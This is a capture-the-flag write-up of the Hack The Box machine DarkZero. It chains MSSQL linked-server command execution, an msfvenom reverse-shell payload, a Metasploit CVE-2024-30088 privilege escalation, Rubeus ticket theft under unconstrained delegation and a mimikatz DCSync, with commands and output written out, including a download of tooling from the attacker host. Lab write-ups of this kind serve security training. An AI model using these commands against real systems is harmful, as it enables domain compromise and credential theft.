DarkZero is a hard-difficulty machine from Hack The Box that deals initially with MSSQL linked servers, allowing us to pivot through a linked SQL server on a secondary domain controller to achieve remote code execution. We’ll then escalate privileges using CVE-2024-30088 to get SYSTEM on the second DC, abuse unconstrained delegation to capture a TGT from DC01, and finally perform a DCSync attack against the parent domain to obtain the domain administrator’s NTLM hash.
DarkZero
Reconnaissance
As is common in real life pentests, we start with credentials for the following account: john.w:RFulUtONCOL!
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-08 10:57:24Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.darkzero.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb | Not valid before: 2025-07-29T11:40:00 |_Not valid after: 2026-07-29T11:40:00 |_ssl-date: TLS randomness does not represent time 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.darkzero.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb | Not valid before: 2025-07-29T11:40:00 |_Not valid after: 2026-07-29T11:40:00 |_ssl-date: TLS randomness does not represent time 1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM | ms-sql-ntlm-info: | 10.129.199.110:1433: | Target_Name: darkzero | NetBIOS_Domain_Name: darkzero | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: darkzero.htb | DNS_Computer_Name: DC01.darkzero.htb | DNS_Tree_Name: darkzero.htb |_ Product_Version: 10.0.26100 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2025-10-08T09:26:12 |_Not valid after: 2055-10-08T09:26:12 |_ssl-date: 2025-10-08T10:59:08+00:00; +7h00m03s from scanner time. | ms-sql-info: | 10.129.199.110:1433: | Version: | name: Microsoft SQL Server 2022 RTM | number: 16.00.1000.00 | Product: Microsoft SQL Server 2022 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 2179/tcp open vmrdp? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.darkzero.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb | Not valid before: 2025-07-29T11:40:00 |_Not valid after: 2026-07-29T11:40:00 |_ssl-date: TLS randomness does not represent time 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.darkzero.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb | Not valid before: 2025-07-29T11:40:00 |_Not valid after: 2026-07-29T11:40:00 |_ssl-date: TLS randomness does not represent time 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (88%) OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 Aggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
We can see this is a Windows domain controller DC01.darkzero.htb with a lot of the usual AD ports open. What stands out here is MSSQL on port 1433 running Microsoft SQL Server 2022. Since we already have credentials, let’s start there.
MSSQL - Linked Servers
We can connect to the MSSQL instance using impacket-mssqlclient with Windows authentication:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(kali㉿kali)-[~] └─$ impacket-mssqlclient 'darkzero.htb/john.w:[email protected]' -windows-auth Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC01): Line 1: Changed database context to 'master'. [*] INFO(DC01): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (160 3232) [!] Press help for extra shell commands SQL (darkzero\john.w guest@master)>
We land as a guest on the master database. One thing I always do in MSSQL engagements is check for linked servers. Enumerating links reveals a second SQL server on DC02.darkzero.ext:
We can see that our john.w account is mapped to dc01_sql_svc on the linked server and we land as dbo on the master database of DC02.darkzero.ext. Even better, xp_cmdshell is enabled and we can execute commands as darkzero-ext\svc_sql. Let’s get a proper reverse shell.
Foothold - Reverse Shell via MSSQL Link
We execute a PowerShell reverse shell through the linked server:
User Name SID ==================== ============================================ darkzero-ext\svc_sql S-1-5-21-1969715525-31638512-2552845157-1103
GROUP INFORMATION -----------------
Group Name Type SID Attributes ========================================== ================ =============================================================== ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT SERVICE\MSSQLSERVER Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 Enabled by default, Enabled group, Group owner LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ============================= ============================== ======== SeChangeNotifyPrivilege Bypass traverse checking Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION -----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
We don’t have SeImpersonatePrivilege here which limits our usual potato attacks. Let’s get a meterpreter session for more options.
Privilege Escalation - CVE-2024-30088
We generate a meterpreter payload and upload it to the target:
1 2 3 4 5 6 7 8 9
┌──(kali㉿kali)-[~] └─$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.6 LPORT=4444 -f exe -o kujen.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: kujen.exe
meterpreter > run post/multi/recon/local_exploit_suggester [*] 172.16.20.2 - Collecting local exploits for x64/windows... /usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/logging-2.4.0/lib/logging.rb:10: warning: /usr/lib/x86_64-linux-gnu/ruby/3.3.0/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0. You can add syslog to your Gemfile or gemspec to silence this warning. Also please contact the author of logging-2.4.0 to request adding syslog into its gemspec. [*] 172.16.20.2 - 205 exploit checks are being tried... [+] 172.16.20.2 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable. [+] 172.16.20.2 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable. [+] 172.16.20.2 - exploit/windows/local/cve_2022_21882_win32k: The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022 [+] 172.16.20.2 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable. [+] 172.16.20.2 - exploit/windows/local/cve_2023_28252_clfs_driver: The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default [+] 172.16.20.2 - exploit/windows/local/cve_2024_30085_cloud_files: The target appears to be vulnerable. [+] 172.16.20.2 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113 [+] 172.16.20.2 - exploit/windows/local/cve_2024_35250_ks_driver: The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022 [+] 172.16.20.2 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated. [*] Running check method for exploit 49 / 49 [*] 172.16.20.2 - Valid modules for session 1: ============================
# Name Potentially Vulnerable? Check Result - ---- ----------------------- ------------ 1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable. 2 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable. 3 exploit/windows/local/cve_2022_21882_win32k Yes The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022 4 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable. 5 exploit/windows/local/cve_2023_28252_clfs_driver Yes The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default 6 exploit/windows/local/cve_2024_30085_cloud_files Yes The target appears to be vulnerable. 7 exploit/windows/local/cve_2024_30088_authz_basep Yes The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113 8 exploit/windows/local/cve_2024_35250_ks_driver Yes The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022 9 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
We have plenty of options here. We’ll go with CVE-2024-30088 which is a Windows kernel elevation of privilege vulnerability. We background our meterpreter session and configure the exploit:
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.16.6 yes The listen address (an interface may be specified) LPORT 4455 yes The listen port
Exploit target:
Id Name -- ---- 0 Windows x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lport 8284 lport => 8284 msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit [*] Started reverse TCP handler on 10.10.16.6:8284 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113 [*] Reflectively injecting the DLL into 3092... [+] The exploit was successful, reading SYSTEM token from memory... [+] Successfully stole winlogon handle: 880 [+] Successfully retrieved winlogon pid: 600 [*] Sending stage (203846 bytes) to 10.129.199.110 [*] Meterpreter session 4 opened (10.10.16.6:8284 -> 10.129.199.110:59043) at 2025-10-08 01:08:20 -0400
meterpreter > shell Process 828 created. Channel 1 created. Microsoft Windows [Version 10.0.20348.2113] (c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd ../../users/administrators cd ../../users/administrators The system cannot find the path specified.
C:\Windows\system32>cd ../../users/administrator cd ../../users/administrator
C:\Users\Administrator>cd desktop cd desktop
C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is E415-87AD
C:\Users\Administrator\Desktop>type user.txt type user.txt 92a46b6f2d91d59b479b8bb659e40979
C:\Users\Administrator\Desktop>
We are now SYSTEM on DC02 and we can grab the user flag.
Lateral Movement - Unconstrained Delegation
Now that we have SYSTEM on DC02, we need to move laterally to DC01 which is the domain controller for darkzero.htb. We upload PowerView and check for unconstrained delegation:
DC02 has the TRUSTED_FOR_DELEGATION flag set which means it’s configured for unconstrained delegation. We can use Rubeus to monitor for incoming TGTs. We run Rubeus in monitor mode and wait for DC01’s machine account TGT to come in:
1 2 3 4 5 6 7 8 9 10 11 12 13
[*] 10/8/2025 1:31:02 PM UTC - Found new TGT:
User : [email protected] StartTime : 10/8/2025 6:31:00 AM EndTime : 10/8/2025 4:31:00 PM RenewTill : 10/15/2025 6:31:00 AM Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable Base64EncodedTicket :
PS C:\users\administrator\desktop> ./Rubeus.exe ptt /ticket:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDZA4tGXPOXC/hNMYPqm4sD31BOfwroajVPeX/BgTeLv6uLfDUi9HAdDZxuesT6Mf/jQ6vyhHzmLbFxav897YkwKq+8poI85YwybQ3Pbe8m3D7Ss9BPTDBxUnHSqy9n6jOZ62R+3TSRUO/WgF5Dpxc99EtUKWmjGbFvQwuzH6fn/jRuEltyW69SNwtMw2IYKRnGTbHnoSkuoDsEfPwsu9e6oMub6QeRD0bjlSZLr5xkR9POEylt6JfS/RhnzvxpoM16geKZDTKxhSOWWN2o0uAtdDcLVhOtVTs00rVEStCw/FAA1dpgsUB6QfMHqBq+I3NLp0T4yUR+idY99bAOgdBi8ZPpb2bLd1eSmzR6nJmrESDZo4LWp5+amVsnqKiAz2cupzaHpq8sDiiMQhoRgKrviShXV0TGyKWmk6h71Ft9Mm9kDuIO0a67ggPVCnayAAuWaEKx8FCkImKQvZN9cg8J8nNhaeIXiEP8eZSQL2qvlrlQx7N7yRpzSLCJ4e4tzlTDkpoOsRLUjktTObj+moph9NXsIRgwQMOdYfuwfxIlYX6Ky0Rqz5KH3TKt7h6tjTaawavQAMmPCQXeCgfPqFxE6j4j8SqZekLz5pd/Iii0rHsLFHaeP6OBD0Y4e0v8WLP9Eum9TFvEZyRRUlDjL7ZqbEZ2IitPfkmetJK6qcMDbFthtLpQf9wOvZTYlzYpHoBSbQnTLfWQqCq8oiK5jUf5jk9GVSbILhz3L/1zDVtqJ+ps8FGGnMk/+cUeiK3lVRs8EFRBz5OQ6vAAjzUbHUNyO/6ifsTTOxNH489mtns9ma3h7QIe+WGt+VtSMLyRcBALwcFLDGWCfoHzwH/9YxMKNUGdxTuRQcQ7BTr7JDzmfXLtF7S9XPccdF12Ed+2IYNnPAck6HZqodQP7faewNVQEO/9wpd5vr+7CREGZbq8sy5YBAbD5vmkYxhftc8lGspizc0NQVrW5zdHUSXK2IvGTWGI8L1V+HQLjA4zWax7/NwZuqbgcnuPwAw3XWU4fr8SaHZ+x88wXY/6X3XCueWxpjbrGMkiRloobrdRd0eL9UX8N2FnYEf8A7jsS4xndKY3IliOwU+OL31XQGxFKUfUHz0a2pgAbWaDQlnd4meFd7MyV++u7r/eduKR3xQFNbh/dWcg3LsZioxyPiP8yx2heuLnOQ92QBStUBeYS3euBUe3bFuWbWieAypclnWjvJoXFEBcKBANuhYi+BwC7jaht4Osk5Oj0iv7wOgRnxlpQVCwzH+CrojIsI8SeGOKqRrkx7jRUZKEa6Vaw2lHKbJBQ9SsQHaeRdtAO11rtw42hk9wHGxK9LC1cs3vQgsrLMUyQ3xd97WGU6bSesCdA8uvPDIBbJOR9D9LOcUO5SbcY0YwUv1Z8BPmO3MtU49Kt61ei/xiGKEIrHKQQ+pYz99GH75/Njp6jo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg1iBIi6N0M++dx9EWONluC28TRnReb5hY8MqfjA1zsYahDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDgxMzMxMDBaphEYDzIwMjUxMDA4MjMzMTAwWqcRGA8yMDI1MTAxNTEzMzEwMFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI= ./Rubeus.exe ptt /ticket:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDZA4tGXPOXC/hNMYPqm4sD31BOfwroajVPeX/BgTeLv6uLfDUi9HAdDZxuesT6Mf/jQ6vyhHzmLbFxav897YkwKq+8poI85YwybQ3Pbe8m3D7Ss9BPTDBxUnHSqy9n6jOZ62R+3TSRUO/WgF5Dpxc99EtUKWmjGbFvQwuzH6fn/jRuEltyW69SNwtMw2IYKRnGTbHnoSkuoDsEfPwsu9e6oMub6QeRD0bjlSZLr5xkR9POEylt6JfS/RhnzvxpoM16geKZDTKxhSOWWN2o0uAtdDcLVhOtVTs00rVEStCw/FAA1dpgsUB6QfMHqBq+I3NLp0T4yUR+idY99bAOgdBi8ZPpb2bLd1eSmzR6nJmrESDZo4LWp5+amVsnqKiAz2cupzaHpq8sDiiMQhoRgKrviShXV0TGyKWmk6h71Ft9Mm9kDuIO0a67ggPVCnayAAuWaEKx8FCkImKQvZN9cg8J8nNhaeIXiEP8eZSQL2qvlrlQx7N7yRpzSLCJ4e4tzlTDkpoOsRLUjktTObj+moph9NXsIRgwQMOdYfuwfxIlYX6Ky0Rqz5KH3TKt7h6tjTaawavQAMmPCQXeCgfPqFxE6j4j8SqZekLz5pd/Iii0rHsLFHaeP6OBD0Y4e0v8WLP9Eum9TFvEZyRRUlDjL7ZqbEZ2IitPfkmetJK6qcMDbFthtLpQf9wOvZTYlzYpHoBSbQnTLfWQqCq8oiK5jUf5jk9GVSbILhz3L/1zDVtqJ+ps8FGGnMk/+cUeiK3lVRs8EFRBz5OQ6vAAjzUbHUNyO/6ifsTTOxNH489mtns9ma3h7QIe+WGt+VtSMLyRcBALwcFLDGWCfoHzwH/9YxMKNUGdxTuRQcQ7BTr7JDzmfXLtF7S9XPccdF12Ed+2IYNnPAck6HZqodQP7faewNVQEO/9wpd5vr+7CREGZbq8sy5YBAbD5vmkYxhftc8lGspizc0NQVrW5zdHUSXK2IvGTWGI8L1V+HQLjA4zWax7/NwZuqbgcnuPwAw3XWU4fr8SaHZ+x88wXY/6X3XCueWxpjbrGMkiRloobrdRd0eL9UX8N2FnYEf8A7jsS4xndKY3IliOwU+OL31XQGxFKUfUHz0a2pgAbWaDQlnd4meFd7MyV++u7r/eduKR3xQFNbh/dWcg3LsZioxyPiP8yx2heuLnOQ92QBStUBeYS3euBUe3bFuWbWieAypclnWjvJoXFEBcKBANuhYi+BwC7jaht4Osk5Oj0iv7wOgRnxlpQVCwzH+CrojIsI8SeGOKqRrkx7jRUZKEa6Vaw2lHKbJBQ9SsQHaeRdtAO11rtw42hk9wHGxK9LC1cs3vQgsrLMUyQ3xd97WGU6bSesCdA8uvPDIBbJOR9D9LOcUO5SbcY0YwUv1Z8BPmO3MtU49Kt61ei/xiGKEIrHKQQ+pYz99GH75/Njp6jo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg1iBIi6N0M++dx9EWONluC28TRnReb5hY8MqfjA1zsYahDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDgxMzMxMDBaphEYDzIwMjUxMDA4MjMzMTAwWqcRGA8yMDI1MTAxNTEzMzEwMFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
We now have DC01’s machine account TGT imported into our session.
DCSync - Domain Administrator
With DC01’s TGT, we can now perform a DCSync attack against darkzero.htb to extract the domain administrator’s NTLM hash. We upload BetterSafetyKatz and run mimikatz’s lsadump::dcsync:
PS C:\users\administrator\desktop> iwr 10.10.16.6/BetterSafetyKatz.exe -outfile BetterSafetyKatz.exe iwr 10.10.16.6/BetterSafetyKatz.exe -outfile BetterSafetyKatz.exe PS C:\users\administrator\desktop> ./BetterSafetyKatz.exe "lsadump::dcsync /user:darkzero\administrator" "exit" ./BetterSafetyKatz.exe "lsadump::dcsync /user:darkzero\administrator" "exit" [+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9 [+] Randomizing strings in memory [+] Suicide burn before CreateThread!
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:darkzero\administrator [DC] 'darkzero.ext' will be the domain [DC] 'DC02.darkzero.ext' will be the DC server [DC] 'darkzero\administrator' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9)
The first attempt targets the wrong domain darkzero.ext since we’re running from DC02. We specify the /domain:darkzero.htb flag to target the parent domain:
PS C:\users\administrator\desktop> ./BetterSafetyKatz.exe "lsadump::dcsync /user:darkzero\administrator /domain:darkzero.htb" "exit" ./BetterSafetyKatz.exe "lsadump::dcsync /user:darkzero\administrator /domain:darkzero.htb" "exit" [+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and @Mrtn9 [+] Randomizing strings in memory [+] Suicide burn before CreateThread!
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:darkzero\administrator /domain:darkzero.htb [DC] 'darkzero.htb' will be the domain [DC] 'DC01.darkzero.htb' will be the DC server [DC] 'darkzero\administrator' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) Account expiration : Password last change : 9/10/2025 9:42:44 AM Object Security ID : S-1-5-21-1152179935-589108180-1989892463-500 Object Relative ID : 500
We successfully extracted the domain administrator’s NTLM hash: 5917507bdf2ef2c2b0a869a1cba40726. From here we can pass the hash to authenticate to DC01 and claim the root flag.
That was it for DarkZero, hope you learned something new! -0xkujen
